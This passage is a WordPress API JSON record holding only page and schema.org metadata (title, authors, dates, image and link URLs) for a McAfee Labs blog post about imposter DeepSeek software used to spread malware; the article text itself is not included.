reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users","datePublished":"2025-03-17T07:00:41+00:00","dateModified":"2025-03-17T20:57:34+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/"},"wordCount":2339,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","articleSection":["Internet Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/","url":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/","name":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee 
Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","datePublished":"2025-03-17T07:00:41+00:00","dateModified":"2025-03-17T20:57:34+00:00","description":"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","width":600,"height":400},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Internet 
Security","item":"https:\/\/www.mcafee.com\/blogs\/internet-security\/"},{"@type":"ListItem","position":3,"name":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee 
Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/209804","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=209804"}],"version-history":[{"count":14,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/209804\/revisions"}],"predecessor-version":[{"id":210786,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/209804\/revisions\/210786"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/210430"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=209804"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=209804"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=209804"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=209804"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}